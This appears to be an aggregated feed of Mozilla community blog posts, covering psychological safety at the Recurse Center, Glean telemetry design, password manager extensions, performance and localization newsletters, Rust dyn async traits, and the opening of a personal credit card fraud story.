  • Check out Android Beta, which has most of the major feature updates
    • More features to come in FX Android V95/IOS V40 and beyond.

Other products / Experiments

  • Mozilla VPN V2.6 (Oct 20)
    • Multi-Account Container: When used with Mozilla VPN on, MAC allows for even greater privacy by having separate Wireguard tunnels for each container.  This will allow users to have tabs exit in different nodes in the same instance of the browser.
  • Firefox Relay Premium – launch (Oct 27)
    • Unlimited aliases
    • Create your own Domain name

Shout-outs!

  • Thanks to Selim and Chris for helping me with Turkish and Polish keywords for Conversocial.
  • Thanks to Wxie for the help in recognizing other zh-CN locale contributors! Thanks for taking the lead. The team is lucky to have you as a locale leader!
  • Props to Julie for her video experiment in the KB and for sharing the stats with the rest of us. Thanks for bringing more colors to our Knowledge Base!
  • Thanks to Jefferson Scher for straightening out the Firefox Suggest confusion on Reddit. That definitely helps people understand the feature better.

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

William Lachance: Learning about Psychological Safety at the Recurse Center

Last summer, I took a 6-week sabbatical from my job to attend a virtual “programmers retreat” at the Recurse Center. I thought I’d write up some notes on the experience, with a particular lens towards what makes an environment suited towards learning, innovation, and personal growth.

Some context: I’m currently working as a software engineer at Mozilla, building out our data pipeline and analysis tooling. I’ve been at my current position for more than 10 years (my “anniversary” actually passed while I was out). I started out as a senior engineer in 2011, and was promoted to staff engineer in 2016. In tech-land, this is a really long tenure at a company. I felt like it was time to take a break from my day-to-day, explore some new ideas and concepts, and hopefully expose myself to a broader group of people in my field.

My original thinking was that I would mostly be spending this time building out an interactive computation environment I’ve been working on called Irydium. And I did quite a bit of that. However, I think the main thing I took away from this experience was some insight on what makes a remote environment for knowledge work really “click”. In particular, what makes somewhere feel psychologically safe, and how this feeling allows us to innovate and do our best work.

While the Recurse Center obviously has different goals than an organization that builds and delivers consumer software, I do think there are some things that it does that could be applied to Mozilla (and, likely, many other tech workplaces).

What is the Recurse Center?

Most succinctly, the Recurse Center is a “writer’s retreat for programmers”. It tries to provide an environment conducive to learning and creativity, an opportunity to refine your craft and learn new things, both from the act of programming itself and from interactions with the other like-minded people attending. The Recurse Center admits a wide variety of people, from those who have only been through a coding bootcamp to those who have been in the industry many years, like myself. The main admission criteria, from what I gather, are curiosity and friendliness.

Once admitted, you do a “batch”— either a mini (1 week), half-batch (6 weeks), or a full batch (12 weeks). I did a half-batch.

How does it work (during a global pandemic)?

The Recurse experience used to be entirely in-person, in a space in New York City - if you wanted to go, you needed to move there at least temporarily. Obviously that’s out the window during a Global Pandemic, and all activities are currently happening online. This was actually pretty ideal for me at this point in my life, as it allowed me to participate entirely remotely from my home in Hamilton, Ontario, Canada (near Toronto).

There’s a few elements that make “Virtual RC” tick:

  • A virtual space (pictured below) where you can see other people in your cohort. This is particularly useful when you want to jump into a conference room.
  • A shared “calendar” where people can schedule events, either adhoc (e.g. a one off social event, discussing a paper) or on a regular basis (e.g. a reading group)
  • A zulip chat server (which is a bit like Slack) for adhoc conversation with people in your cohort and alumni. There are multiple channels, covering a broad spectrum of interests.

Why does it work?

So far, what I’ve described probably sounds a lot like any remote tech workplace during the pandemic… and it sort of is! In some ways, my schedule and life while at Recurse didn’t feel all that different from my normal day-to-day. Wake up in the morning, drink coffee, meditate, work for roughly 8 hours, done. Qualitatively, however, my experience at Recurse felt unusually productive, and I learned a lot more than I expected to: not just the core stuff related to Irydium, but also unexpected new concepts like CRDTs, product design, and even how Visual Studio Code syntax highlighting works.

What made the difference? Certainly, not having the normal pressures of a workplace helps - but I think there’s more to it than that. The way RC is constructed reinforces a sense of psychological safety which I think is key to learning and growth.

What is psychological safety and why should I care?

Psychological safety is a bit of a hot topic these days, and there’s a lot of discussion about it in management circles. I think it comes down to a feeling that you can take risks and “put yourself out there” without fear that you’ll be ignored, attacked, or ridiculed.

Why is this important? I would argue, because knowledge work is about building understanding — going from a place of not understanding to understanding. If you’re working on anything at all innovative, there is always an element of the unknown. In my experience, there is virtually always a sense of discomfort and uncertainty that goes along with that. This goes double when you’re working around and with people that you don’t know terribly well (and who might have far more experience than you). Are they going to make fun of you for not knowing a basic concept or for expressing an idea that’s “so wrong I don’t even know where to begin”? Or, just as bad, will you not get any feedback on your work at all?

In reality, except in truly toxic environments, you’ll rarely encounter outright abusive behaviour. But the isolation of remote work can breed similar feelings of disquiet and discomfort over time. My sense, after a year of working “hardcore” remote in COVID times, is that our normal workplace rituals of meetings, “stand ups”, and discussions over Slack don’t provide enough space for a meaningful sense of psychological safety to develop. They’re good enough for measuring progress towards agreed-upon goals but a true sense of belonging depends on less tightly scripted interactions among peers.

How the Recurse environment creates psychological safety

But the environment I described above isn’t that different from a workplace, is it? Speaking from my own experience, my coworkers at Mozilla are all pretty nice people. There’s also many channels for informal discussion at Mozilla, and of course direct messaging is always available (via Slack or Matrix). And yet, I still feel there is a pretty large gap between the two experiences. So what makes the difference? I’d say there were three important aspects of Recurse that really helped here: social rules, gentle prompts, and a closed space.

Social rules

There’s been a lot of discussion about community participation guidelines and standards of behaviour in workplaces. In general, these types of policies target really egregious behaviour like harassment, which is a pretty low bar. They aren’t, in my experience, sufficient to create an environment that actually feels safe.

The Recurse Center goes over and above a basic code of conduct, with four simple social rules:

  • No well-actually’s: corrections that aren’t relevant to the point someone was trying to make (this is probably the rule we’re most heavily conditioned to break).
  • No feigned surprise: acting surprised when someone doesn’t know something.
  • No backseat driving: lobbing advice from across the room (or across the online chat) without really joining or engaging in a conversation.
  • No subtle -isms: subtle expressions of racism, sexism, ageism, homophobia, transphobia and other kinds of bias and prejudice.

These rules aren’t “commandments” and you’re not meant to feel shame for violating them. The important thing is that by being there, the rules create an environment conducive to learning and growth. You can be reasonably confident that you can bring up a question or discussion point (or respond to one) and it won’t lead to a bad outcome. For example, you can expect not to be made fun of for asking what a UNIX socket is (and if you are, you can tell the person doing so to stop). Rather than there being an unspoken rule that everyone should already know everything about what they are trying to do, there is a spoken rule that states it’s expected that they don’t.

Working on Irydium, there’s an infinite number of ways I can feel incompetent: that comes with the territory when engaging with concepts I still don’t feel completely comfortable with: parsers, compilers, WebAssembly… the list goes on. Knowing that I could talk about what I was working on (or something I was interested in), and that the responses I got would be constructive and directed at the project rather than the person, made all the difference.1

Gentle prompts

The thing I loved the most about Recurse were the gentle prompts to engage with other people, talk about your work, and get help. A few that I really enjoyed during my time there:

  • The “checkins” channel. People would post what’s going on with their time at RC, their challenges, their struggles. Often there would be little snippets about people’s lives in there, which built a feeling of community.
  • Hack & Tell: A weekly event where a group of us would get together in a Zoom room, talk about working on or building something, then rejoin the chat an hour later to show off what we accomplished.
  • Coffee Chats: A “coffee chat” bot at RC would pair you with other people in your batch (or alumni) on a cadence of your choosing. I met so many great people this way!
  • Weekly Presentations: At the end of each week, people would sign up to share something that they were working on or learned.

… and I could go on. What’s important are not the specific activities, but their end effect of building connectedness, creating opportunities for serendipitous collaboration and interaction (more than one discussion group came out of someone’s checkin post on Zulip) and generally creating an environment well-suited to learning.

A (semi) closed space

One of the things that makes the gentle prompts above “work” is that you have some idea of who you’re going to be interacting with. Having some predictability about who’s going to see what you post and engage with you (that they were vetted by RC’s interview process and are committed to the above-mentioned social rules) gives you some confidence to be vulnerable and share things that you might be reluctant to otherwise.

Those who have known me for a while will probably see the above as being a bit of a departure from what I normally preach: throughout my tenure at Mozilla, I’ve constantly pushed the people I’ve worked with to do more work in public. In the case of a product like Firefox, which touches so many people, I think open and transparent practices are absolutely essential to building trust, creating opportunity, and ensuring that our software reflects a diversity of views. I applied the same philosophy to Irydium’s development while I was at the Recurse Center: I set up a public Matrix channel to discuss the project, published all my work on GitHub, and was quite chatty about what I was working on, both in this blog and on Twitter.

The key, I think, is being deliberate about what approach you take when: there is a place for both public and private conversations about what we work on. I’m strongly in favour of open design documents, community calls, public bug trackers and open source in general. But I think it’s also pretty ok to have smaller spaces for learning, personal development, and question asking. I know I strongly appreciated having a smaller group of people that I could talk to about ideas that were not yet fully formed: you can always bring them out into the open later. The psychological risk of working in public can be mitigated by the psychological safety that can be developed within an intentional community.

Bringing it back

Returning to my job, I wondered if it might be possible to bring some of what I described above back to Mozilla? Obviously not everything would be directly transferable: Mozilla has its own mission and goals, and there are pressures that exist in a workplace that do not exist in an environment purely directed at learning. Still, I suspected that there was something we could do here. And that it would be worth doing, not just to improve the felt experience of the people here (though that would be reason enough) but also to get more feedback on our work and create more opportunities for collaboration and innovation.

I felt like trying to do something inside our particular organization (Data Engineering and Data Science) would be the most tractable initial step. I talked a bit about my experience with Will Kahn-Greene (who has been at Mozilla around the same length of time as I have) and we came up with what we called the “Data Neighbourhood” project: a set of grassroots micro-initiatives to increase our connectedness as a group. As an organization directed primarily at serving other parts of Mozilla, most of our team’s communication is directed outward. It’s often hard to know what everyone else is up to, where they’re struggling, and how we could help each other out. Attacking that problem directly seemed like the best place to start.

The first experiment we tried was a “data checkins” channel on Slack, a place for people to talk informally about their work (or life!). I explicitly set it up with a similar set of social rules as outlined above and tried to emphasize that it was a place to talk about how things are going, rather than a place to report status to your manager. After a somewhat slow start (the initial posts were from Will, myself, and a few other people from Data Engineering who had been around for a long time) we’re beginning to see engagement from others, including some newer people I hadn’t interacted with much before. There’s also been a few useful threads of conversations across different sub-teams (for example, a discussion on how we identify distinct versions of Firefox for iOS) that likely would not have happened without the channel.

Since then, others have tried a few other things in the same vein (an ad hoc coffee chat pairing bot, a “writing help” channel) and there are some signs of success. There’s clearly an appetite for new and better ways for us to relate to each other about the work we’re doing, and I’m excited to see how these ideas evolve over time.

I suspect there are limits to how psychologically safe a workplace can ever feel (and some of that is probably outside of any individual’s control). There are dynamics in a workplace which make applying some of Recurse’s practices difficult. In particular, a posture of “not knowing things is o.k.” may not apply perfectly to a workplace where people are hired (and promoted) based on perceived competence and expertise. Still, I think it’s worth investigating what might be possible within the constraints of the system we’re in. There are big potential benefits, for our creative output and our well-being.

Many thanks to Jenny Zhang, Kathleen Beckett, Joe Trellick, Taylor Phebillo and Vaibhav Sagar, and Will Kahn-Greene for reviewing earlier drafts of this post.

  1. This is generally considered best practice inside workplaces as well. For example, see Google’s guide on how to write code review comments

Data@MozillaThis Week in Glean: Designing a telemetry collection with Glean

Designing a telemetry collection with Glean

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All “This Week in Glean” blog posts are listed in the TWiG index).

Whenever I get a chance to write about Glean, I am usually writing about some aspects of working on Glean. This time around I’m going to turn that on its head by sharing my experience working with Glean as a consumer with metrics to collect, specifically in regards to designing a Nimbus health metrics collection. This post is about sharing what I learned from the experience and what I found to be the most important considerations when designing a telemetry collection.

I’ve been helping develop Nimbus, Mozilla’s new experimentation platform, for a while now. It is one of many cross-platform tools written in Rust and it exists as part of the Mozilla Application Services collection of components. With Nimbus being used in more and more products we have a need to monitor its “health”, or how well it is performing in the wild. I took on this task of determining what we would need to measure and designing the telemetry and visualizations because I was interested in experiencing Glean from a consumer’s perspective.

So how exactly do you define the “health” of a software component? When I first sat down to work on this project, I had some vague idea of what this meant for Nimbus, but it really crystallized once I started looking at the types of measurements enabled by Glean. Glean offers different metric types designed to measure anything from a simple text value to counts of things, and even events that show how things occur in the flow of the application. For Nimbus, I knew that we would want to track errors, as well as a handful of numeric measurements like how much memory we used and how long it takes to perform certain critical tasks.

As a starting point, I began thinking about how to record errors, which seemed fairly straightforward. The first thing I had to consider was exactly what it was we were measuring (the “shape” of the data), and what questions we wanted to be able to answer with it. Since we have a good understanding of the context in which each of the errors can occur, we really only wanted to monitor the counts of errors to know if they increase or decrease. Counting things is one of the things Glean is really good at, so my choice of metric type came down to flexibility and organization. Since there are 20+ different errors that are interesting to Nimbus, we could have used a separate counter metric for each of them, but that starts to get burdensome: each error would need its own entry in the metrics.yaml file. Using a separate counter for each error also adds a bit of complexity to writing SQL for analysis or a dashboard: a query over the errors would need every error metric in the select statement, and any new errors would require the query to be modified to include them.

Instead of distinct counters for each error, I chose to model recording Nimbus errors after how Glean records its own internal errors, by using a LabeledCounterMetric. This means that all errors are collected under the same metric name, but have an additional property called a “label”. Labels are like sub-categories within that one metric. That makes it a little easier to instrument, both by keeping clutter down in the metrics.yaml file and by making it a little easier to create useful dashboards for monitoring error rates. We want to end up with a chart of errors that lets us spot an unusual spike or change in the trends, something like this:

A line graph showing multiple colored lines and their changes over time

We expect some small number of errors (these are computers, after all), but we can easily establish a baseline for each type of error, which allows us to configure alerts if things move too far outside expectations.
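
Once the labeled counter is declared in metrics.yaml, recording an error from Rust code is a one-liner. Here is a minimal sketch; the metric and label names are hypothetical, and it assumes a metrics module generated by glean_parser, so the real Nimbus instrumentation may differ:

// Sketch only: `nimbus_health::errors` and the label name are made up,
// and `crate::metrics` stands in for the glean_parser-generated module.
use crate::metrics::nimbus_health;

fn on_experiment_fetch_failed() {
    // Every error kind shares one labeled counter; the label is the sub-category.
    nimbus_health::errors.get("experiment_fetch_failed").add(1);
}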

The next set of things I wanted to know about Nimbus were in the area of performance. We want to detect regressions or problems with our implementation that might not show up locally for a developer in a debug build, so we measure these things at scale to see what performance looks like for everyone using Nimbus. Once again, I needed to think about what exactly we wanted to measure, and what sort of questions we wanted to be able to answer with the data. Since the performance data we were interested in was a measurement of time or memory, we wanted to be able to measure samples from a client periodically and then look at how different measurements are distributed across the population. We also needed to consider exactly when and where we wanted to measure these things. For instance, was it more important or more accurate to measure the database size as we were initializing, or deinitializing? Finally, I knew we would be interested in how that distribution changes over time, so we needed some way to represent this by date or by version when we analyzed the data.
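
To give a feel for what that kind of instrumentation could look like, here is a rough sketch using the timing distribution type described below; the metric names are hypothetical and assume a glean_parser-generated metrics module:

// Sketch only: `nimbus_health::db_init_time` is a made-up timing
// distribution metric, assumed to be generated from metrics.yaml.
use crate::metrics::nimbus_health;

fn initialize_database() {
    // Start a timer, do the work we want to measure, then accumulate the sample.
    let timer_id = nimbus_health::db_init_time.start();
    open_and_migrate_database();
    nimbus_health::db_init_time.stop_and_accumulate(timer_id);
}

fn open_and_migrate_database() {
    // Placeholder for the real initialization work being measured.
}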

Glean gives us some great metric types to measure samples of things like time and size such as TimingDistributionMetrics and MemoryDistributionMetrics. Both of these metric types allow us to specify a resolution that we care about so that they can “bucket” up the samples into meaningfully sized chunks to create a sparse payload of data to keep things lean. These metric types also provide a “sum” so we can calculate an average from all the samples collected. When we sum these samples across the population, we end up with a histogram like the following, where measurements collected are on the x-axis, and the counts or occurrences of those measurements on the y-axis:

A histogram showing bell curve shaped data

This is a little limited because we can only look at the point in time of the data as a single dimension, whether that’s aggregated by time such as per day/week/year or aggregated on something else like the version of the Nimbus SDK or application. We can’t really see the change over time or version to see if something we added really impacted our performance. Ideally, we wanted to see how Nimbus performed compared to other versions or other weeks. When I asked around for good representations to show something like this, it was suggested that something like a ridgeline chart would be a great visualization for this sort of data:

A ridgeline chart, represented as a series of histograms arranged to form visualization that looks like a mountain ridge

Ridgeline charts give us a great idea of how the distribution changes, but unfortunately I ran into a little setback when I found out that the tools we use don’t currently have a view like that, so I may be stuck with a bit of a compromise until they do. Here is another visualization example, this time with the data stacked on top of each other:

A series of histograms stacked on top of each other

Even though something like this is much harder to read than the ridgeline, we can still see some change from one version to the next; picking out the sequence just becomes much harder. So I’m still left with a bit of an issue in representing the performance data the way we wanted. I think it’s at least something that can be iterated on to be more usable in the future, perhaps using something similar to GLAM’s visualization of percentiles of a histogram.

To conclude, I really learned the value of planning and thinking about telemetry design before instrumenting anything. The most important things to consider when designing a collection are what you are measuring and what questions you will need to answer with the data. Both of those questions can affect not only which metric type you choose to represent your data, but also where you want to measure something. Thinking about what questions you want to answer ahead of time lets you make sure that you are measuring the right things to be able to answer those questions. Planning before instrumenting can also help you choose the right visualizations to make answering those questions easier, as well as add things like alerts for when things aren’t quite right. So, take a little time to think about your telemetry collection before instrumenting metrics, and don’t forget to validate the metrics once they are instrumented to ensure that they are, in fact, measuring what you think and expect. Plan ahead and I promise you, your data scientists will thank you.

Firefox Add-on ReviewsHow to choose the right password manager browser extension

All good password managers should, of course, effectively secure passwords; and they all basically do the same thing—you create a single, easy-to-remember master password to access your labyrinth of complex logins. Password managers not only spare you the hassle of remembering a maze of logins; they can also offer suggestions to help make your passwords even stronger. Fortunately there’s no shortage of capable password protectors out there. But with so many options, how do you choose the one that’ll work best for you?

Here are some of our favorite password managers. They all offer excellent password protection, but with distinct areas of strength.

What are the best FREE password manager extensions? 

Bitwarden

With the ability to create unlimited passwords across as many devices as you like, Bitwarden – Free Password Manager is one of the best budget-minded choices. 

Fortunately you don’t have to sacrifice strong security just because Bitwarden is free. The extension provides advanced end-to-end 256-bit AES encryption for extraordinary protection. 

Paid tiers include Team and Business plans that offer additional benefits like priority tech support, self-hosting capabilities, and more.

Roboform Password Manager

Also utilizing end-to-end 256-bit AES encryption, Roboform has a limited but potent feature set. 

A very intuitive interface makes it easy to manage compelling features like… 

  • Sync with 2FA apps (e.g. Google Authenticator)
  • Sync your Roboform data across multiple devices
  • Single-click logins
  • Automatically save new passwords 
  • Handles multi-step logins
  • Strong password generator
  • 7 form-filling templates for common cases (Person, Business, Passport, Address, Credit Card, Bank Account, Car, Custom)
Roboform makes it easy to manage your most sensitive data like banking information.

LastPass Password Manager

If you’re searching for an all-around solid password manager on desktop, LastPass is a worthy consideration. Its free tier supports only one device, but you get a robust feature set if you’re okay with a single device limitation (price tiers available for multiple device and user plans).

Key features include…

  • Simple, intuitive interface
  • Security Dashboard suggests password improvements and performs Dark Web monitoring to see if any of your vital information has leaked 
  • Multi-factor authentication
  • Save all types of auto-fill forms like credit cards, addresses, banking information, etc.

What are the most professional grade password managers?

1Password

The most full featured password manager available, 1Password is not only a password manager but a dynamic digital vault system that secures private notes, financial information, auto-fill forms, and more. With a slick, intuitive interface, the extension makes managing your sensitive information a breeze. 

The “catch” is that 1Password has no free tier (just a free trial period). But the cost of 1Password may be worth it for folks who want effective password management (end-to-end 256-bit AES encryption) plus a bevy of other great features like…

  • Vaults help you keep your various protected areas (e.g. passwords, financial info, addresses, etc.) segregated so if your 1Password account is set for family or business, it’s easy to grant specific Vault access to certain members. 
  • Watchtower is a collection of security services that alert you to emerging 1Password threats, potentially compromised logins, and more
  • Travel mode is great for international travellers; when Vaults are in Travel mode they’ll automatically become inaccessible when you cross over potentially insecure borders 
  • App support across Mac, iOS, Windows, Android, Linux, and Chrome OS
  • Two-factor authentication for additional protection

From individual to family, team, and full-scale enterprise plans, you can see if 1Password’s pricing tiers are worth it for you. 

MYKI Password Manager & Authenticator

With a unique, decentralized approach to data storage plus other distinct features, MYKI stands apart in many interesting ways from its password manager peers. Do note, however, that MYKI is optimized to work best with a mobile device, should that be a consideration. 

Beautifully designed and easy to use, MYKI handles all the standard stuff you’d expect—it creates and stores strong passwords and has various auto-fill functions. Where MYKI earns distinction is through two key features: 

  1. Local data storage. Your passwords and other personal info only exist on your devices—not some remote cloud service. Reasonable minds may differ on the security benefits of cloud versus local storage, but if you’re concerned about your information existing on a cloud service that could be compromised, you might consider keeping all this critical data within your localized system
  2. Mobile device optimization. While you don’t need a mobile device to use MYKI as a basic password manager, the extension is certainly augmented by a mobile companion; with an integrated iOS or Android device you can… 
    1. Enable two-factor authentication (2FA) for added security
    2. Enable biometric authentication (e.g. iOS Touch ID, Windows Hello, etc.) and avoid a master password

These are some of our favorite browser-based password managers. Feel free to explore more password managers on addons.mozilla.org.


Mozilla Performance BlogPerformance Sheriff Newsletter (September 2021)

In September there were 174 alerts generated, resulting in 23 regression bugs being filed on average 6.4 days after the regressing change landed.

Welcome to the September 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 2 days
  • 80% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 3.5 days
  • 74% of valid regressions were associated with bugs within 5 days

Sheriffing Efficiency (September 2021)

 

Summary of alerts

Each month we’ll highlight the regressions and improvements found.

Note that whilst we usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst we believe these metrics to be accurate at the time of writing, some of them may change over time.

We would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for September can be found here (for those with access).

Mozilla Localization (L10N)L10n Report: October Edition

October 2021 Report

Please note some of the information provided in this report may be subject to change as we are sometimes sharing information about projects that are still in early stages and are not final yet. 

Welcome!

New l10n-driver

Welcome eemeli, our new l10n-driver! He will be working on Fluent and Pontoon, and is part of our tech team along with Matjaž. We hope we can all connect soon so you can meet him.

New localizers

Katelem from Obolo locale. Welcome to localization at Mozilla!

Are you a locale leader and want us to include new members in our upcoming reports? Contact us!

New community/locales added

Obolo (ann) locale was added to Pontoon.

New content and projects

What’s new or coming up in Firefox desktop

A new major release (MR2) is coming for Firefox desktop with Firefox 94. The deadline to translate content for this version, currently in Beta, is October 24.

While MR2 is not as content heavy as MR1, there are changes to very visible parts of the UI, like the onboarding for both new and existing users. Make sure to check out the latest edition of the Firefox L10n Newsletter for more details, and instructions on how to test.

What’s new or coming up in mobile

Focus for Android and iOS have gone through a new refresh! This was done as part of our ongoing MR2 work – which has also covered Firefox for Android and iOS. You can read about all of this here.

Many of you have been heavily involved in this work, and we thank you for making this MR2 launch across all mobile products such a successful release globally.

We are now starting our next iteration of MR2 releases. We are still currently working on scoping out the mobile work for l10n, so stay tuned.

One thing to note is that the l10n schedule dates for mobile should now be aligned across product operating systems: one l10n release cycle for all of android, and another release cycle for all of iOS. As always, Pontoon deadlines remain your source of truth for this.

What’s new or coming up in web projects
Firefox Accounts

The Firefox Accounts team has been working on transitioning from Gettext to Fluent. They are in the middle of migrating server.po to auth.ftl, the component that handles the email feature. Unlike previous migrations, where the localized strings were not part of the plan, this time the team wanted to include them as much as possible. The initial attempt didn’t go as planned due to multiple technical issues; the new auth.ftl file made a brief appearance in Pontoon and is now disabled. They will give it another go after confirming that the identified issues have been addressed and tested.

Legal docs

All the legal docs are translated by our vendor. Some of you have reported translation errors or content that is out of sync with the English source. If you spot any issues (wrong terminology, typos, or missing content, to name a few), you can file a bug. Because of the nature of the content, we generally do not encourage localizers to provide translations themselves. If the changes are minor, you can create a PR and ask for a peer review to confirm your change before it is merged. If the overall quality is bad, we will ask the vendor to change translators.

Please note, the locale support for legal docs varies from product to product. Starting this year, the number of supported locales also has decreased to under 20. Some of the previously localized docs are no longer updated. This might be the reason you see your language out of sync with the English source.

Mozilla.org

Five more mobile specific pages were added since our last report. If you need to prioritize them, please give higher priority to the Focus, Index and Compare pages.

What’s new or coming up in SuMo

Lots of new stuff since our last update here in June. Here are some of the highlights:

  • We’re working on refreshing the onboarding experience in SUMO. The content preparation was mostly done in Q3, and the implementation is expected this quarter, before the end of the year.
  • Catch up on what’s new in our support platform by reading our release notes in Discourse. One highlight of the past quarter is that we integrated a Zendesk form for Mozilla VPN into SUMO. We don’t have the capability to detect subscribers at the moment, so everyone can file a ticket for now, but we’re hoping to add that capability in the future.
  • Firefox Focus has joined our Play Store support efforts. Contributors should now be able to reply to Google Play Store reviews for Firefox Focus from Conversocial. We also created this guideline to help contributors compose replies to Firefox Focus reviews.
  • We welcomed two new team members in Q3. Joe, who is our Support Operation Manager, is now taking care of the premium customer support experience. And Abby, the new Content Manager, is our team’s latest addition; she will be working closely with Fabi and our KB contributors to improve our help content.

You’re always welcome to join our Matrix or the contributor forum to talk more about anything related to support!

What’s new or coming up in Pontoon

Submit your ideas and report bugs via GitHub

We have enabled GitHub Issues in the Pontoon repository and made it the new place for tracking bugs, enhancements and tasks for Pontoon development. At the same time, we have disabled the Pontoon Component in Bugzilla, and imported all open bugs into GitHub Issues. Old bugs are still accessible on their existing URLs. For reporting security vulnerabilities, we’ll use a newly created component in Bugzilla, which allows us to hide security problems from the public until they are resolved.

Using GitHub Issues will make it easier for the development team to resolve bugs via commit messages and put them on a Roadmap, which will also be moved to GitHub soon. We also hope GitHub Issues will make suggesting ideas and reporting issues easier for the users. Let us know if you run into any issues or have any questions!

More improvements to the notification system coming

As part of our H1 effort to better understand how notifications are being used, the following features received the most votes in a localizer survey:

  • Notifications for new strings should link to the group of strings added.
  • For translators and locale managers, get notifications when there are pending suggestions to review.
  • Add the ability to opt-out of specific notifications.

Thanks to eemeli, the first item was resolved back in August. The second feature has also been implemented, which means reviewers will receive weekly notifications about newly created unreviewed suggestions within the last week. Work on the last item – ability to opt-out of specific notification types – has started.

Newly published localizer facing documentation

We published two new posts in the Localization category on Discourse:

Events

  • Michal Stanke shared his experience as a volunteer in the open source community at the annual International Translation Day event hosted by WordPress! Way to go!
  • Want to showcase an event coming up that your community is participating in? Reach out to any l10n-driver and we’ll include that (see links to emails at the bottom of this report)

Useful Links

Questions? Want to get involved?

  • If you want to get involved, or have any question about l10n, reach out to:

Did you enjoy reading this report? Let us know how we can improve by reaching out to any one of the l10n-drivers listed above.

Niko MatsakisDyn async traits, part 6

A quick update to my last post: first, a better way to do what I was trying to do, and second, a sketch of the crate I’d like to see for experimental purposes.

An easier way to roll our own boxed dyn traits

In the previous post I covered how you could create vtables and pair them up with a data pointer to kind of “roll your own dyn”. After I published the post, though, dtolnay sent me this Rust playground link to show me a much better approach, one based on the erased-serde crate. The idea is that instead of making a “vtable struct” with a bunch of fn pointers, we create a “shadow trait” that reflects the contents of that vtable:

// erased trait:
trait ErasedAsyncIter {
    type Item;
    fn next<'me>(&'me mut self) -> Pin<Box<dyn Future<Output = Option<Self::Item>> + 'me>>;
}

Then the DynAsyncIter struct can just be a boxed form of this trait:

pub struct DynAsyncIter<'data, Item> {
    pointer: Box<dyn ErasedAsyncIter<Item = Item> + 'data>,
}

We define the “shim functions” by implementing ErasedAsyncIter for all T: AsyncIter:

impl<T> ErasedAsyncIter for T
where
    T: AsyncIter,
{
    type Item = T::Item;
    fn next<'me>(&'me mut self) -> Pin<Box<dyn Future<Output = Option<Self::Item>> + 'me>> {
        // This code allocates a box for the result
        // and coerces into a dyn:
        Box::pin(AsyncIter::next(self))
    }
}

And finally we can implement the AsyncIter trait for the dynamic type:

impl<'data, Item> AsyncIter for DynAsyncIter<'data, Item> {
    type Item = Item;

    type Next<'me>
    where
        Item: 'me,
        'data: 'me,
    = Pin<Box<dyn Future<Output = Option<Item>> + 'me>>;

    fn next(&mut self) -> Self::Next<'_> {
        self.pointer.next()
    }
}

Yay, it all works, and without any unsafe code!

What I’d like to see

This “convert to dyn” approach isn’t really specific to async (as erased-serde shows). I’d like to see a decorator that applies it to any trait. I imagine something like:

// Generates the `DynAsyncIter` type shown above:
#[derive_dyn(DynAsyncIter)]
trait AsyncIter {
    type Item;
    async fn next(&mut self) -> Option<Self::Item>;
}

But this ought to work with any -> impl Trait return type, too, so long as Trait is dyn safe and implemented for Box<T>. So something like this:

// Generates a `DynSillyIterTools` type along the same lines:
#[derive_dyn(DynSillyIterTools)]
trait SillyIterTools: Iterator {
    // Iterate over the iter in pairs of two items.
    fn pair_up(&mut self) -> impl Iterator<Item = (Self::Item, Self::Item)>;
}

would generate an erased trait that returns a Box<dyn Iterator<(...)>>. Similarly, you could do a trick with taking any impl Foo and passing in a Box<dyn Foo>, so you can support impl Trait in argument position.
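
To make that concrete, the erased “shadow trait” that such a derive could plausibly generate for SillyIterTools might look roughly like this (a sketch only; derive_dyn is hypothetical, so the exact shape is up for grabs):

// A possible generated erased trait: the returned iterator is boxed so it can
// live behind a pointer, mirroring the ErasedAsyncIter example above.
trait ErasedSillyIterTools: Iterator {
    fn pair_up<'me>(
        &'me mut self,
    ) -> Box<dyn Iterator<Item = (Self::Item, Self::Item)> + 'me>
    where
        Self::Item: 'me;
}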

Even without impl trait, derive_dyn would create a more ergonomic dyn to play with.

I don’t really see this as a “long term solution”, but I would be interested to play with it.

Comments?

I’ve created a thread on internals if you’d like to comment on this post, or others in this series.

The Mozilla BlogHacked! Unravelling a data breach

This is a story about paying a steep price for a pair of cheap socks.

The first loose thread in June

One Tuesday morning as I* was having my coffee and toast before kicking off the work day, I got a text from my credit card company alerting me to a suspected fraud charge. Of course I was alarmed and started looking into it right away. 

I messaged my husband: Are you getting any fraud charge alerts? Nope, just me. 

Soon after, I received an email order confirmation (then another and another) for electronic goods I didn’t purchase. The email receipt showed my home billing address, with a different shipping address, which happened to be the location of a hotel in my city. I found it odd and scary that someone local had my credit card number matched to my actual name, home address and email address. I imagined them holed up in a hotel room opening boxes of stolen goods and reselling them on Craigslist. But wouldn’t the thief realize I (and other victims) would get these email messages? 

Wait. Was someone using my email account?! 

Hoping it wasn’t too late, I sprang into action, quickly changing my email password and verifying that my account wasn’t logged into any unfamiliar devices. Everything seemed okay there. I wondered if it could have been a mashup of data breaches and scrapes that allowed a thief to merge the information into a more complete picture. The thought crossed my mind that a keylogger was installed on my computer. 

Meanwhile, my credit card company canceled my cards and set about issuing new ones. As it turned out, what had actually happened didn’t target me personally — and here’s what I was able to weave together.

Backstitch to May

Like most people on Instagram, I love to see friends’ pics and scroll through other fun visual content. I don’t mind ads for movies and shows (hello entertaining videos that fill my playlist) or for clothes and accessories (hello virtual window shopping.) One ad kept reappearing for custom print socks. So cute. I caved and ordered a pair of these socks for my husband for Father’s Day, featuring our kids’ faces. They arrived, as adorable as could be, and we all had a good laugh when he opened them. 

Life went on. Then something else happened.

A tangled knot in July

Apparently the would-be credit card thief had also used FedEx for shipping, and when my credit card was declined, FedEx reverted to billing the shipper, which was the thief posing as me with my real address.

When I received the first invoice in the mail from FedEx, I called my credit card company, who assured me that the charge had been flagged as fraud. The representative advised me to ignore the letter and said that FedEx knew the charge wasn’t mine. But the second letter from FedEx made it clear they weren’t giving up on collecting the fee billed to my “account” even though the real me doesn’t have one.

